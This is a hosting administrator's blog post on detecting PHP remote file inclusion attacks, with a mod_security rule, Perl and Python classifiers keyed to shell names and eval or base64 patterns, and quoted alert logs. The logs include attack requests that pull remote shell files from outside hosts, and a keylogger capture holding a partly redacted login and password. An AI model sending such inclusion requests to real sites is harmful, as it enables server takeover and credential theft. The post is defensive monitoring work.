Remote File Inclusion Detector

PHP allow_url_include headaches


allow_url_include, oh boy. Disable it to somewhat improve your security posture, or leave it enabled and don't lose customers whose scripts need it. What if we left it enabled, but carefully monitored when it was being abused? That's precisely what we did, and detected plenty of attacks as a result.

Here's how it worked: first, log attempts to abuse remotely included files over HTTP or HTTPS (I didn't consider other PHP protocol wrappers at the time). I added this to modsec.user.conf, which logged abuse attempts to modsec's audit_log:

        SecFilterSelective REQUEST_URI "\.php\?(.*)=http" "log,pass"

Next, using Perl's File::Tail module, poll the modsec audit_log every second for remote file inclusion attempts based on our rule. This was the logic from the script:

use strict;
use warnings;

# Classify one audit_log entry that matched the mod_security rule above.
# $request is the request line and $useragent the User-Agent header pulled
# from that entry; the description ends up in the alert email.
sub classify_request
{
    my ($request, $useragent) = @_;
    my $event_description = "Unknown Event";

    # Included URL points at a bare IP address instead of a hostname
    if ($request =~ /\/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\//)
    {
        $event_description = "Remote destination is an IP address";
    }
    # Shell disguised as an image or text file, e.g. c.jpg?command=
    elsif ($request =~ /\.(gif|jpg|txt|dat)\?/i)
    {
        $event_description = "The request contains something similar to: .gif?command=";
    }
    # Names of common PHP shells or command parameters
    elsif ($request =~ /(lol([^a-zA-Z])|cmd|r57|c99)/i)
    {
        $event_description = "The request possibly contains phpshell or remote command activity";
    }
    # Obfuscated or dynamically evaluated payloads
    elsif ($request =~ /base64_decode/)
    {
        $event_description = "base64_decode found in request string";
    }
    elsif ($request =~ /eval\(/)
    {
        $event_description = "The request contains \"eval(\"";
    }
    # User agent of the LWP library, common in automated scanners
    elsif ($useragent =~ /libwww-perl/i)
    {
        $event_description = "The user agent is libwww-perl";
    }

    return $event_description;
}

This required fairly regular whitelisting in the beginning, as many customers had scripts that legitimately used this feature.
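The detection logic and the whitelisting step above, as an added Python example (not the author's Perl script): it parses constructed log lines in Apache combined format, pulls out the remotely included URL on the same `.php?...=http` trigger as the mod_security rule, skips hosts on a hypothetical per-customer whitelist, and applies the post's checks in the post's order. The sample lines and the whitelist host are constructed; real modsec 1.x audit_log entries are multi-line and would need their own parser.

```python
import re
from urllib.parse import urlsplit

# Constructed sample lines in Apache combined log format (not real modsec 1.x
# audit_log entries, which are multi-line and would need their own parser).
SAMPLE_LOG = """\
203.0.113.5 - - [09/Oct/2006:11:37:12 +0000] "GET /oneadmin/newspublish///include.php?path[docroot]=http://img.bad-host.example/images/c.jpg? HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [29/Jul/2007:17:51:20 +0000] "GET /imarticleexchange/index.php?page=http://198.51.100.4/skins/skin_27/blank HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.8 - - [01/Aug/2007:10:00:00 +0000] "GET /index.php?page=http://files.bad-host.example/blank HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [01/Aug/2007:10:05:00 +0000] "GET /rss.php?feed=http://feeds.partner.example/latest.xml HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Aug/2007:10:06:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
# Hosts that customer scripts legitimately include from (hypothetical whitelist).
ALLOWED_INCLUDES = {"feeds.partner.example"}

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<request>\S+) \S+" \d{3} \S+ "[^"]*" "(?P<ua>[^"]*)"$')
# Same trigger as the mod_security rule (.php?...=http), also capturing the URL.
RFI_RE = re.compile(r'\.php\?.*?=(https?://[^&\s]*)')
# The post's request checks, in the post's order: first match wins.
CHECKS = [
    (re.compile(r'/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/'), "Remote destination is an IP address"),
    (re.compile(r'\.(gif|jpg|txt|dat)\?', re.I), "The request contains something similar to: .gif?command="),
    (re.compile(r'lol[^a-zA-Z]|cmd|r57|c99', re.I), "The request possibly contains phpshell or remote command activity"),
    (re.compile(r'base64_decode'), "base64_decode found in request string"),
    (re.compile(r'eval\('), 'The request contains "eval("'),
]

def classify(request, useragent):
    # Describe why a remote-include request looks malicious; "Unknown Event" otherwise.
    for pattern, description in CHECKS:
        if pattern.search(request):
            return description
    if re.search(r'libwww-perl', useragent, re.I):
        return "The user agent is libwww-perl"
    return "Unknown Event"

def scan(log_text, allowed_hosts):
    # Return (source IP, included host, description) for every line worth an alert.
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        rfi = m and RFI_RE.search(m["request"])
        if not rfi:
            continue  # unparseable, or the mod_security rule would not have fired
        host = urlsplit(rfi.group(1)).hostname
        if host in allowed_hosts:
            continue  # whitelisted: a customer script that needs this include
        alerts.append((m["src"], host, classify(m["request"], m["ua"])))
    return alerts
```

Removing a host from the whitelist makes its requests surface as "Unknown Event", which is the signal that a new customer script needs reviewing and, if legitimate, whitelisting.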

Here are some of the emails I received from the script, alerting me to successful attacks. I've replaced all instances of customer domain names with "example.com". Check out the keystroke logging activity I unintentionally picked up in the bottom one.

DATE:            09/Oct/2006:11:37:12
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         /oneadmin/newspublish///include.php?path[docroot]=http://www.sv-sirzenich.de/images/c.jpg?
REFERER:         "-"
SOURCE:          202.155.147.188
USER AGENT:      "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"


The request contains something similar to: .gif?command=


DATE:            29/Jul/2007:17:51:20
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         /imarticleexchange/index.php?page=http://80.190.251.67/skins/skin_27/blank
REFERER:         "-"
SOURCE:          218.247.167.36
USER AGENT:      "Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.5) Gecko/20070713 Firefox/2.0.0.5"


Remote destination is an IP address


This one came from a frustrated attacker. The customer's website used a popular articles hosting application with a trivial remote file inclusion vulnerability. I'd already patched this customer when I started getting email alerts that someone was trying to hack their site. After a few minutes of trying unsuccessfully to exploit a bug that didn't exist, they gave up, but not before leaving a message in the logs:

DATE:            26/Oct/2007:16:20:03
METHOD:          GET
STATUS CODE:     200
SITE:            www.example.com
REQUEST:         //index.php?page=http://If.u.patch.shell.u.are.gay/shell.txt?::
REFERER:         "-"
SOURCE:          62.101.126.209
USER AGENT:      "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR


The request contains something similar to: .gif?command=

Why yes, I *did* "patch shell", 62.101.126.209. And I'm not interested, but thanks anyway.


Here's some keystroke logging activity that records the active application (Internet Explorer), the title text, mouse clicks, and keystrokes. Detecting this was completely unintentional. [M] = mouse click.

DATE:            13/Jun/2007:11:02:46
METHOD:          GET
STATUS CODE:     500
SITE:            example.com
REQUEST:         /logger.php?action=log&user=SYSTEM&data=<b>IEXPLORE.EXE</b> <font color=0000FF>[orkut - Efetuar login - Microsoft Internet Explorer - http://www.orkut.com/GLogin.aspx?done=http://www.orkut.com/Album.aspx?uid=10420673428816551739]</font>redacted@hotmail.com <b>[M]</b> m12345m <b>[M]</b> m12345m <b>[M]</b> [DEL][DEL][DEL][DEL][DEL][DEL][redacted@hotmail.com <b>[M]</b> m12345m <b>[M]</b> <br>- \x8a
REFERER:         "-"
SOURCE:          201.58.177.113
USER AGENT:      "-" - "-"


Unknown Event